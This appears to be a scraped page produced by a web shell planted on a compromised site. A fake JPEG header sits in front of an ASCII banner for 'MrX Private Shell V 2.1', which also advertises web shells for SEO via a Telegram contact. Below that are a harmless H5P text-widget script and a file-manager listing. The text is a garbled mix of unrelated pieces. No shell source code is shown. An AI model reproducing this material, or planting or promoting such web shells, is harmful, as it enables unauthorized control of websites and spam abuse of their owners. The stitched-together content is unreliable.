����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
var H5P = H5P || {};
/**
* Constructor.
*
* @param {object} params Options for this library.
*/
H5P.Text = function (params) {
this.text = params.text === undefined ? '<em>New text</em>' : params.text;
};
/**
* Wipe out the content of the wrapper and put our HTML in it.
*
* @param {jQuery} $wrapper
*/
H5P.Text.prototype.attach = function ($wrapper) {
$wrapper.addClass('h5p-text').html(this.text);
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 0c05e747970af692e49e1c552b30619771a6f9dc | File | 417 B | 0666 |
|